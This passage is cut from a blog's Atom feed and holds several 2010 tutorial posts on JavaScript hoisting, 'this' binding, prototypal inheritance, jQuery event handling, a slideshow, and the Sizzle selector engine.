      <updated>2010-03-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/two-ways-of-declaring-functions</id>
      <content type="html"><![CDATA[<p>All the JavaScript books I have read so far do not distinguish between the following two ways of declaring a function.</p><pre><code class="language-javascript">var foo = function () {};
function foo() {}</code></pre><p>Thanks to <a href="http://www.adequatelygood.com">Ben</a>, today I learned that <a href="http://www.adequatelygood.com/2010/2/JavaScript-Scoping-and-Hoisting">there is a difference</a>.</p><h2>When a var is used to declare a function then only the variable declaration gets hoisted up</h2><pre><code class="language-javascript">function test() {
  foo();
  var foo = function () {
    console.log(&quot;foo&quot;);
  };
}
test();</code></pre><p>The above code is the same as the one given below.</p><pre><code class="language-javascript">function test() {
  var foo;
  foo();
  foo = function () {
    console.log(&quot;foo&quot;);
  };
}
test();</code></pre><h2>When a function is declared without var then both the variable declaration and the body get hoisted up</h2><pre><code class="language-javascript">function test() {
  foo();
  function foo() {
    console.log(&quot;foo&quot;);
  }
}
test();</code></pre><p>The above code is the same as the one given below.</p><pre><code class="language-javascript">function test() {
  var foo;
  foo = function () {
    console.log(&quot;foo&quot;);
  };
  foo();
}
test();</code></pre><h2>Conclusion</h2><p>Now it will be clear why <code>foo()</code> does not work in the following case while <code>bar()</code> does work.</p><pre><code class="language-javascript">function test() {
  foo(); // TypeError &quot;foo is not a function&quot;
  bar(); // &quot;this will run!&quot;
  var foo = function () {
    // function expression assigned to local variable 'foo'
    alert(&quot;this won't run!&quot;);
  };
  function bar() {
    // function declaration, given the name 'bar'
    alert(&quot;this will run!&quot;);
  }
}
test();</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Lessons learned from JavaScript quizzes]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/lessons-learned-from-javascript-quizzes"/>
      <updated>2010-03-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/lessons-learned-from-javascript-quizzes</id>
      <content type="html"><![CDATA[<p>Nicholas answered three JavaScript quizzes on his blog. I am not interested in quiz questions like the one given below.</p><pre><code class="language-javascript">var num1 = 5,
  num2 = 10,
  result = num1++ + num2;</code></pre><p>However, some of the questions helped me learn a few things.</p><h2>Questions from quiz</h2><p>Recently there was a <a href="http://www.nczonline.net/blog/2010/02/23/answering-soshnikovs-quiz">quiz</a>.</p><p>This was question #5 in the original blog. I have modified the quiz a little bit to suit my needs.</p><pre><code class="language-javascript">var x = 10;
var foo = {
  x: 20,
  bar: function () {
    var x = 30;
    return this.x;
  },
};

// 1
console.log(foo.bar());
// 2
console.log(foo.bar());
// 3
console.log(foo.bar.call());</code></pre><p>I got the first two answers wrong. In JavaScript a variable and a property are two different things. When <code>this.xyz</code> is invoked, the JavaScript engine is looking for a property called <code>xyz</code>.</p><pre><code class="language-javascript">var bar = function () {
  var x = 30;
  return this.x;
};
console.log(bar()); //=&gt; undefined</code></pre><p>In the above case the output is <code>undefined</code>. This is because <code>this.x</code> looks for a property named <code>x</code>, and since no such property was found, <code>undefined</code> is the answer.</p><pre><code class="language-javascript">var foo = {
  x: 20,
  bar: function () {
    return x;
  },
};
console.log(foo.bar());</code></pre><p>The above code causes a <code>ReferenceError</code> because <code>x is not defined</code>. The same theory applies here. In this case <code>x</code> is a variable, and since no such variable was found, the code failed.</p><p>Coming back to the third part of the original question. This one uses call.</p><pre><code class="language-javascript">console.log(foo.bar.call());</code></pre><p>The first argument of the <code>call</code> or <code>apply</code> method determines what <code>this</code> would be inside the function. 
If no argument is passed, then the JavaScript engine assumes that <code>this</code> is the global scope, which translates to <code>this</code> being <code>window</code>. Hence the answer is <code>10</code> in this case.</p><h2>Questions from another quiz</h2><p>There was another <a href="http://www.nczonline.net/blog/2010/02/18/my-javascript-quiz-answers">quiz</a>.</p><p>In the original blog this is question #2.</p><pre><code class="language-javascript">var x = 5,
  o = {
    x: 10,
    doIt: function doIt() {
      var x = 20;
      setTimeout(function () {
        alert(this.x);
      }, 10);
    },
  };
o.doIt();</code></pre><p>The key thing to remember here is that <code>all functions passed into setTimeout() are executed in the global scope</code>.</p><p>In the original blog this is question #5.</p><pre><code class="language-javascript">var o = {
    x: 8,
    valueOf: function () {
      return this.x + 2;
    },
    toString: function () {
      return this.x.toString();
    },
  },
  result = o &lt; &quot;9&quot;;
alert(o);</code></pre><p>The thing to remember here is that when a comparison is done, the <code>valueOf</code> method is called on the object.</p><h2>Questions from a third <a href="http://www.nczonline.net/blog/2010/01/26/answering-baranovskiys-javascript-quiz">quiz</a></h2><p>This is question #1 in the original blog.</p><pre><code class="language-javascript">if (!(&quot;a&quot; in window)) {
  var a = 1;
}
alert(a);</code></pre><p>I knew that all variable declarations are hoisted up but somehow failed to apply that logic here. Please see the original blog for a detailed answer.</p><p>This is question #5 in the original blog.</p><pre><code class="language-javascript">function a() {
  alert(this);
}
a.call(null);</code></pre><p>I knew that if nothing is passed to the <code>call</code> method then <code>this</code> becomes global, but did not know that if <code>null</code> is passed then <code>this</code> also becomes global.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Practical example of need for prototypal inheritance]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/pratical-example-of-need-for-prototypal-inheritance"/>
      <updated>2010-03-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/pratical-example-of-need-for-prototypal-inheritance</id>
      <content type="html"><![CDATA[<p>Alex Sexton wrote <a href="http://alexsexton.com/?p=51">a wonderful article</a> on how to use an inheritance pattern to manage a large piece of code. His code also shows a practical need for prototypal inheritance when writing modular code.</p><h2>Creating a standard jQuery plugin</h2><p>Given below is code that does exactly what Alex's code does.</p><pre><code class="language-javascript">$(function () {
  $.fn.speaker = function (options) {
    if (this.length) {
      return this.each(function () {
        var defaultOptions = {
          name: &quot;No name&quot;,
        };
        options = $.extend({}, defaultOptions, options);
        var $this = $(this);
        $this.html(&quot;&lt;p&gt;&quot; + options.name + &quot;&lt;/p&gt;&quot;);
        var fn = {};
        fn.speak = function (msg) {
          $this.append(&quot;&lt;p&gt;&quot; + msg + &quot;&lt;/p&gt;&quot;);
        };
        $.data(this, &quot;speaker&quot;, fn);
      });
    }
  };
});</code></pre><p>For smaller plugins this code is not too bad. However, if the plugin is huge then it presents one big problem: the code for the business problem and the code that deals with jQuery are all mixed in. 
What it means is that if tomorrow the same functionality needs to be implemented for the Prototype framework, it is not clear what part of the code deals with the framework and what part deals with business logic.</p><h2>Separating business logic and framework code</h2><p>Given below is code that separates business logic from framework code.</p><pre><code class="language-javascript">var Speaker = function (opts, elem) {
  this._build = function () {
    this.$elem.html(&quot;&lt;h1&gt;&quot; + options.name + &quot;&lt;/h1&gt;&quot;);
  };
  this.speak = function (msg) {
    this.$elem.append(&quot;&lt;p&gt;&quot; + msg + &quot;&lt;/p&gt;&quot;);
  };

  var defaultOptions = {
    name: &quot;No name&quot;,
  };
  var options = $.extend({}, defaultOptions, opts);
  this.$elem = $(elem);
  this._build();
};

$(function () {
  $.fn.speaker = function (options) {
    if (this.length) {
      return this.each(function () {
        var mySpeaker = new Speaker(options, this);
        $.data(this, &quot;speaker&quot;, mySpeaker);
      });
    }
  };
});</code></pre><p>This code is an improvement over the first iteration. However, the whole business logic is captured inside a function. 
This code can be further improved by embracing the object literal style of coding.</p><h2>Final Improvement</h2><p>The third and final iteration of the code is the code presented by Alex.</p><pre><code class="language-javascript">var Speaker = {
  init: function (options, elem) {
    this.options = $.extend({}, this.options, options);
    this.elem = elem;
    this.$elem = $(elem);
    this._build();
  },
  options: {
    name: &quot;No name&quot;,
  },
  _build: function () {
    this.$elem.html('&lt;h1&gt;' + this.options.name + '&lt;/h1&gt;');
  },
  speak: function (msg) {
    this.$elem.append('&lt;p&gt;' + msg + '&lt;/p&gt;');
  },
};

// Make sure Object.create is available in the browser (for our prototypal inheritance)
if (typeof Object.create !== 'function') {
  Object.create = function (o) {
    function F() {}
    F.prototype = o;
    return new F();
  };
}

$(function () {
  $.fn.speaker = function (options) {
    if (this.length) {
      return this.each(function () {
        var mySpeaker = Object.create(Speaker);
        mySpeaker.init(options, this);
        $.data(this, 'speaker', mySpeaker);
      });
    }
  };
});</code></pre><p>Notice the Object.create pattern Alex used. The business logic code was converted from a function to a JavaScript object. However, the problem is that you can't call <code>new</code> on that object, and you need new objects so that you can dole one out to each element. The Object.create pattern comes to the rescue.</p><p>This pattern takes a standard object and returns a new object that has the input object as its prototype. So you get a brand new object for each element, and you get to have all your business logic written in the object literal way and not in a function. If you want to know more about prototypal inheritance then you can read about it in a <a href="prototypal-inheritance-in-javascript">previous blog</a>.</p><p><code>Object.create</code> is now part of <a href="http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf">ECMAScript 5</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Prototypal inheritance in JavaScript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/prototypal-inheritance-in-javascript"/>
      <updated>2010-03-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/prototypal-inheritance-in-javascript</id>
      <content type="html"><![CDATA[<p>One of the key features of the JavaScript language is its support for the prototype property. This feature can be used to bring inheritance to JavaScript.</p><h2>In the beginning there was duplication</h2><pre><code class="language-javascript">function Person(dob) {
  this.dob = dob;
  this.votingAge = 21;
}</code></pre><pre><code class="language-javascript">function Developer(dob, skills) {
  this.dob = dob;
  this.skills = skills || &quot;&quot;;
  this.votingAge = 21;
}</code></pre><pre><code class="language-javascript">// create a Person instance
var person = new Person(&quot;02/02/1970&quot;);

// create a Developer instance
var developer = new Developer(&quot;02/02/1970&quot;, &quot;JavaScript&quot;);</code></pre><p>As you can see, both Person and Developer objects have a votingAge property. This is code duplication. This is an ideal case where inheritance can be used.</p><h2>prototype property</h2><p>Whenever you create a function, that function instantly gets a property called prototype. The initial value of this prototype property is an empty JavaScript object <code>{}</code>.</p><pre><code class="language-javascript">var fn = function () {};
fn.prototype; //=&gt; {}</code></pre><p>The JavaScript engine, while looking up a method on an instance, first searches for the method in the instance itself. 
Then the engine looks for that method in the function's prototype object.</p><p>Since prototype itself is a JavaScript object, more methods can be added to this object.</p><pre><code class="language-javascript">var fn = function () {};
fn.prototype.author_name = &quot;John&quot;;

var f = new fn();
f.author_name; //=&gt; John</code></pre><h2>Refactoring code to make use of the prototype property</h2><p>Currently the Person function is defined like this.</p><pre><code class="language-javascript">function Person(dob) {
  this.dob = dob;
  this.votingAge = 21;
}</code></pre><p>The problem with the above code is that every time a new instance of Person is created, two new properties are created and they take up memory. If a million objects are created then all instances will have a property called <code>votingAge</code> even though the value of votingAge is going to be the same. All the million Person instances can refer to the same votingAge if it is defined in the prototype. This will save a lot of memory.</p><pre><code class="language-javascript">function Person(dob) {
  this.dob = dob;
}
Person.prototype.votingAge = 21;</code></pre><p>The modified solution will save memory if a lot of objects are created. However, notice that now it will take a bit longer for the JavaScript engine to look up <code>votingAge</code>. Previously the JavaScript engine would have looked for a property named <code>votingAge</code> inside the person object and would have found it. Now the engine will not find the <code>votingAge</code> property inside the person object. 
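This can be checked directly with hasOwnProperty; here is a small sketch reusing the article's Person example:

```javascript
// Sketch of the refactored Person: votingAge now lives on the
// prototype, so it is not an own property of the instance.
function Person(dob) {
  this.dob = dob;
}
Person.prototype.votingAge = 21;

var person = new Person("02/02/1970");

console.log(person.hasOwnProperty("dob")); // true: found in the first hop
console.log(person.hasOwnProperty("votingAge")); // false: lives on the prototype
console.log(person.votingAge); // 21: resolved via the prototype chain
```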
Then the engine will look at the person object's prototype and will find the <code>votingAge</code> property there. It means that in the modified code the engine finds <code>votingAge</code> on the second hop instead of the first hop.</p><h2>Bringing inheritance using prototype property</h2><p>Currently Person is defined like this.</p><pre><code class="language-javascript">function Person(dob) {
  this.dob = dob;
}
Person.prototype.votingAge = 21;</code></pre><p>If the Developer object wants to extend Person then all that needs to be done is this.</p><pre><code class="language-javascript">function Developer(dob, skills) {
  this.skills = skills || &quot;&quot;;
  this.dob = dob;
}
Developer.prototype = new Person();</code></pre><p>Now a Developer instance will have access to the votingAge property. This is much better: there is no longer any code duplication between Developer and Person.</p><p>However, notice that looking up the votingAge property from a Developer instance will take an extra hop.</p><ul><li>The JavaScript engine will first look for the votingAge property in the Developer instance object.</li><li>Next, the engine will look for the votingAge property in the prototype of the Developer instance, which is an instance of Person. votingAge is not declared on the Person instance.</li><li>Next, the engine will look for the votingAge property in the prototype of the Person instance, and there the property will be found.</li></ul><p>Since only the properties that are common to both Developer and Person are present on Person.prototype, there is nothing to be gained by looking for them in the Person instance. The next implementation will remove the middle man.</p><h2>Remove the middle man</h2><p>Here is the revised implementation of the Developer function.</p><pre><code class="language-javascript">function Developer(dob, skills) {
  this.skills = skills || &quot;&quot;;
  this.dob = dob;
}
Developer.prototype = Person.prototype;</code></pre><p>In the above case Developer.prototype directly refers to Person.prototype.
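</p><p>A quick check of this sharing (not from the original post; it reuses the Person and Developer definitions above):</p><pre><code class="language-javascript">Developer.prototype === Person.prototype; //=&gt; true

var developer = new Developer(&quot;02/02/1970&quot;, &quot;JavaScript&quot;);
developer.votingAge; //=&gt; 21, found on the shared prototype</code></pre><p>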
This will reduce the number of hops needed to get to the <code>votingAge</code> property by one compared to the previous case.</p><p>However, there is a problem. If Developer changes the common property then instances of Person will see the change. Here is an example.</p><pre><code class="language-javascript">Developer.prototype.votingAge = 18;

var developer = new Developer(&quot;02/02/1970&quot;, &quot;JavaScript&quot;);
developer.votingAge; //=&gt; 18

var person = new Person();
person.votingAge; //=&gt; 18. Notice that votingAge for Person has changed from 21 to 18</code></pre><p>In order to solve this problem, Developer.prototype should point to an empty object, and that empty object should refer to Person.prototype.</p><h2>Solving the problem by adding an empty object</h2><p>Here is the revised implementation of the Developer object.</p><pre><code class="language-javascript">function Developer(dob, skills) {
  this.dob = dob;
  this.skills = skills;
}

var F = function () {};
F.prototype = Person.prototype;
Developer.prototype = new F();</code></pre><p>Let's test this code.</p><pre><code class="language-javascript">Developer.prototype.votingAge = 18;

var developer = new Developer(&quot;02/02/1970&quot;, &quot;JavaScript&quot;);
developer.votingAge; //=&gt; 18

var person = new Person();
person.votingAge; //=&gt; 21</code></pre><p>As you can see, with the introduction of the empty object, the Developer instance has a votingAge of 18 while the Person instance has a votingAge of 21.</p><h2>Accessing super</h2><p>If a child wants to access the super object then that should be allowed.
That can be accomplished like this.</p><pre><code class="language-javascript">function Person(dob) {
  this.dob = dob;
}
Person.prototype.votingAge = 21;

function Developer(dob, skills) {
  this.dob = dob;
  this.skills = skills;
}

var F = function () {};
F.prototype = Person.prototype;
Developer.prototype = new F();
Developer.prototype.__super = Person.prototype;
Developer.prototype.votingAge = 18;</code></pre><h3>Capturing it as a pattern</h3><p>The whole thing can be captured in a helper method that makes it simple to create inheritance.</p><pre><code class="language-javascript">var extend = function (parent, child) {
  var F = function () {};
  F.prototype = parent.prototype;
  child.prototype = new F();
  child.prototype.__super = parent.prototype;
};</code></pre><h2>Pure prototypal inheritance</h2><p>A simpler form of pure prototypal inheritance can be structured like this.</p><pre><code class="language-javascript">if (typeof Object.create !== &quot;function&quot;) {
  Object.create = function (o) {
    function F() {}
    F.prototype = o;
    return new F();
  };
}</code></pre><p>Before adding the create method to Object, I checked whether this method already exists. That is important because <code>Object.create</code> is part of ECMAScript 5, and slowly more and more browsers will start adding that method natively to JavaScript.</p><p>You can see that Object.create takes only one parameter. This method does not necessarily create a parent-child relationship, but it can be a very good tool for creating new objects directly from an object literal.</p>]]></content>
    </entry><entry>
       <title><![CDATA[return false considered harmful in live]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/return-false-considered-harmful-in-live-jquery"/>
      <updated>2010-03-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/return-false-considered-harmful-in-live-jquery</id>
      <content type="html"><![CDATA[<p>Check out the following jQuery code, written with jQuery 1.4.2. What do you think will happen when the first link is clicked?</p><pre><code class="language-javascript">$(&quot;a:first&quot;).live(&quot;click&quot;, function () {
  log(&quot;clicked once&quot;);
  return false;
});

$(&quot;a:first&quot;).live(&quot;click&quot;, function () {
  log(&quot;clicked twice&quot;);
  return false;
});</code></pre><p>I was expecting that I would see both messages. However jQuery only logs the very first message.</p><p><code>return false</code> does two things. It stops the default behavior, which is to go and fetch the link mentioned in the <code>href</code> of the anchor tag. It also stops the event from bubbling up. Since the live method relies on event bubbling, it makes sense that the second message does not appear.</p><p>The fix is simple. Just block the default action but let the event bubble up.</p><pre><code class="language-javascript">$(&quot;a:first&quot;).live(&quot;click&quot;, function (e) {
  log(&quot;clicked once&quot;);
  e.preventDefault();
});

$(&quot;a:first&quot;).live(&quot;click&quot;, function (e) {
  log(&quot;clicked twice&quot;);
  e.preventDefault();
});</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Simplest jQuery slideshow code explanation]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/simplest-jquery-slideshow-code-explanation"/>
      <updated>2010-02-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/simplest-jquery-slideshow-code-explanation</id>
      <content type="html"><![CDATA[<p><a href="http://snook.ca">Jonathan Snook</a> wrote a blog post titled <a href="http://snook.ca/archives/javascript/simplest-jquery-slideshow">Simplest jQuery SlideShow</a>. Check out the <a href="http://snook.ca/technical/fade/fade.html">demo page</a>. The full JavaScript code in its entirety is given below. If you understand this code then you don't need to read the rest of the article.</p><pre><code class="language-javascript">$(function () {
  $(&quot;.fadein img:gt(0)&quot;).hide();
  setInterval(function () {
    $(&quot;.fadein :first-child&quot;)
      .fadeOut()
      .next(&quot;img&quot;)
      .fadeIn()
      .end()
      .appendTo(&quot;.fadein&quot;);
  }, 3000);
});</code></pre><h2>appendTo removes and attaches elements</h2><p>In order to understand what's going on above, I am constructing a simple test page. Here is the html markup.</p><pre><code class="language-html">&lt;div id=&quot;container&quot;&gt;
  &lt;div class=&quot;lab&quot;&gt;This is div1&lt;/div&gt;
  &lt;div class=&quot;lab&quot;&gt;This is div2&lt;/div&gt;
&lt;/div&gt;</code></pre><p>Open this page in a browser and execute the following command in Firebug.</p><pre><code class="language-javascript">$(&quot;.lab:first&quot;).appendTo(&quot;#container&quot;);</code></pre><p>Run the above command five or six times to see its effect. Every single time you run it, the order changes.</p><p>The order of the <code>div</code> elements with class <code>lab</code> changes because if a jQuery element is already part of the document and that element is being added somewhere else, then jQuery will do a <code>cut and paste</code> and <em>not</em> a <code>copy and paste</code>. In other words, elements that already exist in the document get plucked out of the document and then inserted somewhere else in the document.</p><h2>Back to the original problem</h2><p>In the original code the very first image is being plucked out of the document and that image is being added to the set again.
In simpler terms, this is what is happening. Initially the order is like this.</p><pre><code class="language-plaintext">Image1
Image2
Image3</code></pre><p>After the code is executed the order becomes this.</p><pre><code class="language-plaintext">Image2
Image3
Image1</code></pre><p>After the code is executed again the order becomes this.</p><pre><code class="language-plaintext">Image3
Image1
Image2</code></pre><p>After the code is executed once more the order becomes this.</p><pre><code class="language-plaintext">Image1
Image2
Image3</code></pre><p>And this cycle continues forever.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How jQuery selects elements using Sizzle]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-jquery-selects-elements-using-sizzle"/>
      <updated>2010-02-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-jquery-selects-elements-using-sizzle</id>
      <content type="html"><![CDATA[<p>jQuery's motto is to select something and do something with it. As jQuery users, we provide the selection criteria and then we get busy doing something with the result. This is a good thing. jQuery provides an extremely simple API for selecting elements. If you are selecting ids then just prefix the name with '#'. If you are selecting a class then prefix it with '.'.</p><p>However, it is important to understand what goes on behind the scenes, for many reasons. One of the important reasons is the performance of rich clients. As more and more web pages use more and more jQuery code, an understanding of how jQuery selects elements will help speed up the loading of pages.</p><h2>What is a selector engine</h2><p>HTML documents are full of html markup. It's a tree-like structure. Ideally speaking, all html documents should be 100% valid xml documents. However, if you miss out on closing a div then browsers forgive you (unless you have asked for strict parsing). Ultimately the browser engine sees a well-formed xml document. Then the browser engine renders that xml as a web page.</p><p>After a page is rendered, those xml elements are referred to as DOM elements.</p><p>JavaScript is all about manipulating this tree structure (DOM elements) that the browser has created in memory. A good example of manipulating the tree is a command like the one given below, which hides the header element. However, in order to hide the header tag, jQuery has to get to that DOM element.</p><pre><code class="language-javascript">jQuery(&quot;#header&quot;).hide();</code></pre><p>The job of a selector engine is to get all the DOM elements matching the criteria provided by a user. There are many JavaScript selector engines on the market.
Paul Irish has <a href="http://paulirish.com/2008/javascript-css-selector-engine-timeline">a nice article</a> about the JavaScript CSS Selector Engine timeline.</p><p><a href="http://sizzlejs.com">Sizzle</a> is a JavaScript selector engine developed by <a href="http://ejohn.org">John Resig</a> and is used internally in jQuery. In this article I will show how jQuery, in conjunction with Sizzle, finds elements.</p><h2>Browsers help you to get to certain elements</h2><p>Browsers do provide some helper functions to get to certain types of elements. For example, if you want to get the DOM element with id <code>header</code> then the <code>document.getElementById</code> function can be used like this.</p><pre><code class="language-javascript">document.getElementById(&quot;header&quot;);</code></pre><p>Similarly, if you want to collect all the p elements in a document then you could use the following code.</p><pre><code class="language-javascript">document.getElementsByTagName(&quot;p&quot;);</code></pre><p>However, if you want something complex like the one given below, then browsers were not much help. It was possible to walk up and down the tree, but traversing the tree was tricky for two reasons: a) the DOM spec is not very intuitive, and b) not all browsers implemented the DOM spec in the same way.</p><pre><code class="language-javascript">jQuery(&quot;#header a&quot;);</code></pre><p>Later the <a href="http://www.w3.org/TR/selectors-api">Selectors API</a> came out.</p><p>The latest versions of all the major browsers support this specification, including IE8. However IE7 and IE6 do not support it. This API provides the <code>querySelectorAll</code> method, which allows one to write a complex selector query like <code>document.querySelectorAll(&quot;#score&gt;tbody&gt;tr&gt;td:nth-of-type(2)&quot;)</code>.</p><p>It means that if you are using IE8 or a current version of any other modern browser then the jQuery code <code>jQuery('#header a')</code> will not even hit Sizzle.
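</p><p>The overall dispatch can be sketched like this (a simplified illustration, not jQuery's actual source; <code>select</code> and the fallback call are hypothetical names):</p><pre><code class="language-javascript">function select(selector, context) {
  context = context || document;
  if (context.querySelectorAll) {
    try {
      // modern browsers: let the native engine do the work
      return context.querySelectorAll(selector);
    } catch (e) {
      // the native engine rejected the selector; fall through
    }
  }
  // old browsers or unsupported selectors: hand the request to Sizzle
  return Sizzle(selector, context);
}</code></pre><p>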
That query will be served by a call to <code>querySelectorAll</code>.</p><p>However, if you are using IE6 or IE7, Sizzle will be invoked for jQuery('#header a'). This is one of the reasons why some apps perform much slower on IE6/7 compared to IE8: a native browser function is much faster than element retrieval by Sizzle.</p><h2>Selection process</h2><p>jQuery has a lot of optimizations baked in to make things run faster. In this section I will go through some queries and will try to trace the route jQuery follows.</p><h2>$('#header')</h2><p>When jQuery sees that the input string is just one word and is looking for an id, then jQuery invokes document.getElementById. Straight and simple. Sizzle is not invoked.</p><h2>$('#header a') on a modern browser</h2><p>If the browser supports querySelectorAll then querySelectorAll will satisfy this request. Sizzle is not invoked.</p><h2>$('.header a[href!=&quot;hello&quot;]') on a modern browser</h2><p>In this case jQuery will try to use querySelectorAll, but the result would be an exception (at least on Firefox). The browser will throw an exception because the querySelectorAll method does not support certain selection criteria. When the browser throws an exception, jQuery will pass the request on to Sizzle. Sizzle not only supports CSS 3 selectors but goes above and beyond that.</p><h2>$('.header a') on IE6/7</h2><p>On IE6/7 <code>querySelectorAll</code> is not available, so jQuery will pass this request on to Sizzle. Let's see in a little more detail how Sizzle will go about handling this case.</p><p>Sizzle gets the selector string '.header a'.
It splits the string into two parts and stores them in a variable called parts.</p><pre><code class="language-javascript">parts = [&quot;.header&quot;, &quot;a&quot;];</code></pre><p>The next step is the one which sets Sizzle apart from other selector engines. Instead of first looking for elements with class <code>header</code> and then going down, Sizzle starts with the rightmost selector string. As per <a href="https://www.paulirish.com/2009/perf/">this presentation</a> from Paul Irish, <a href="https://yuilibrary.com/">YUI3</a> and NWMatcher (link is not available) also go right to left.</p><p>So in this case Sizzle starts looking for all <code>a</code> elements in the document. Sizzle invokes the method <code>find</code>. Inside the find method Sizzle attempts to find out what kind of pattern this string matches. In this case Sizzle is dealing with the string <code>a</code>.</p><p>Here is a snippet of code from Sizzle.find.</p><pre><code class="language-plaintext">match: {
  ID: /#((?:[\w\u00c0-\uFFFF-]|\\.)+)/,
  CLASS: /\.((?:[\w\u00c0-\uFFFF-]|\\.)+)/,
  NAME: /\[name=['&quot;]*((?:[\w\u00c0-\uFFFF-]|\\.)+)['&quot;]*\]/,
  ATTR: /\[\s*((?:[\w\u00c0-\uFFFF-]|\\.)+)\s*(?:(\S?=)\s*(['&quot;]*)(.*?)\3|)\s*\]/,
  TAG: /^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/,
  CHILD: /:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,
  POS: /:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,
  PSEUDO: /:((?:[\w\u00c0-\uFFFF-]|\\.)+)(?:\((['&quot;]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/
},</code></pre><p>One by one, Sizzle will go through all the match definitions. In this case, since <code>a</code> is a valid tag, a match will be found for <code>TAG</code>.
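</p><p>You can try the TAG pattern on its own in a console (the regular expression is copied from the snippet above):</p><pre><code class="language-javascript">var TAG = /^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/;

TAG.exec(&quot;a&quot;)[1]; //=&gt; &quot;a&quot;
TAG.exec(&quot;.header&quot;); //=&gt; null, a class selector is not a tag</code></pre><p>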
Next, the following function will be called.</p><pre><code class="language-plaintext">TAG: function(match, context){
  return context.getElementsByTagName(match[1]);
}</code></pre><p>Now the result consists of all <code>a</code> elements.</p><p>The next task is to find out whether each of these elements has a parent element matching <code>.header</code>. In order to test that, a call will be made to the method <code>dirCheck</code>. In short, this is what the call looks like.</p><pre><code class="language-javascript">dir = 'parentNode';
cur = &quot;.header&quot;;
checkSet = [ a www.neeraj.name, a www.google.com ]; // object representation
dirCheck( dir, cur, doneName, checkSet, nodeCheck, isXML );</code></pre><p>The dirCheck method returns whether each element of checkSet passed the test. After that a call is made to the method <code>preFilter</code>. In this method the key code is below.</p><pre><code class="language-javascript">if ( not ^ (elem.className &amp;&amp; (&quot; &quot; + elem.className + &quot; &quot;).replace(/[\t\n]/g, &quot; &quot;).indexOf(match) &gt;= 0) )</code></pre><p>For our example this is what is being checked.</p><pre><code class="language-javascript">&quot; header &quot;.indexOf(&quot; header &quot;);</code></pre><p>This operation is repeated for all the elements in the checkSet. Elements not matching the criteria are rejected.</p><h2>More methods in Sizzle</h2><p>If you dig more into the Sizzle code you will see functions defined for <code>+</code>, <code>&gt;</code> and <code>~</code>.
You will also see methods like these.</p><pre><code class="language-plaintext">enabled: function(elem) {
  return elem.disabled === false &amp;&amp; elem.type !== &quot;hidden&quot;;
},
disabled: function(elem) {
  return elem.disabled === true;
},
checked: function(elem) {
  return elem.checked === true;
},
selected: function(elem) {
  elem.parentNode.selectedIndex;
  return elem.selected === true;
},
parent: function(elem) {
  return !!elem.firstChild;
},
empty: function(elem) {
  return !elem.firstChild;
},
has: function(elem, i, match) {
  return !!Sizzle( match[3], elem ).length;
},
header: function(elem) {
  return /h\d/i.test( elem.nodeName );
},
text: function(elem) {
  return &quot;text&quot; === elem.type;
},
radio: function(elem) {
  return &quot;radio&quot; === elem.type;
},
checkbox: function(elem) {
  return &quot;checkbox&quot; === elem.type;
},
file: function(elem) {
  return &quot;file&quot; === elem.type;
},
password: function(elem) {
  return &quot;password&quot; === elem.type;
},
submit: function(elem) {
  return &quot;submit&quot; === elem.type;
},
image: function(elem) {
  return &quot;image&quot; === elem.type;
},
reset: function(elem) {
  return &quot;reset&quot; === elem.type;
},
button: function(elem) {
  return &quot;button&quot; === elem.type || elem.nodeName.toLowerCase() === &quot;button&quot;;
},
input: function(elem) {
  return /input|select|textarea|button/i.test(elem.nodeName);
}
},
first: function(elem, i) {
  return i === 0;
},
last: function(elem, i, match, array) {
  return i === array.length - 1;
},
even: function(elem, i) {
  return i % 2 === 0;
},
odd: function(elem, i) {
  return i % 2 === 1;
},
lt: function(elem, i, match) {
  return i &lt; match[3] - 0;
},
gt: function(elem, i, match) {
  return i &gt; match[3] - 0;
},
nth: function(elem, i, match) {
  return match[3] - 0 === i;
},
eq: function(elem, i, match) {
  return match[3] - 0 === i;
}</code></pre><p>I use all these methods almost daily, and it was good to see how they are actually implemented.</p><h2>Performance Implications</h2><p>Now that I have a little more understanding of how Sizzle works, I can better optimize my selector queries. Here are two selectors doing the same thing.</p><pre><code class="language-javascript">$(&quot;p.about_me .employment&quot;);
$(&quot;.about_me p.employment&quot;);</code></pre><p>Since Sizzle goes from right to left, in the first case Sizzle will pick up all the elements with the class <code>employment</code> and then Sizzle will try to filter that list. In the second case Sizzle will pick up only the <code>p</code> elements with class <code>employment</code> and then it will filter the list. In the second case the rightmost selection criterion is more specific, and it will bring better performance.</p><p>So the rule with Sizzle is to be more specific on the right hand side and less specific on the left hand side. Here is another example.</p><pre><code class="language-javascript">$(&quot;.container :disabled&quot;);
$(&quot;.container input:disabled&quot;);</code></pre><p>The second query will perform better because the right side of the query is more specific.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding jQuery effects queue]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-jquery-effects-queue"/>
      <updated>2010-02-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-jquery-effects-queue</id>
